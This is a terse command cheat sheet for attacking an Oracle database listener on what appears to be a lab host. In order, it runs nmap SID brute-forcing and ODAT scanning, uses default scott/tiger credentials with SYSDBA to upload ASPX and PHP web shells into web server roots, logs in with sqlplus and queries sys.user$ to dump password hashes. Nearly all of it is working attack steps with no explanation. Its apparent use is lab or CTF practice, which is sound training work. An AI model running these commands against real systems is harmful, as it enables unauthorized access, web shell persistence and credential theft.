nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
odat all -s 10.129.204.235
# File Upload
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot shell.aspx ./shell.aspx
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile /var/www/html shell.php ./shell.php
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
sqlplus scott/tiger@10.129.204.235/XE
sqlplus scott/tiger@10.129.204.235/XE as sysdba
# Komutlar
select table_name from all_tables;
select * from user_role_privs;
select name, password from sys.user$;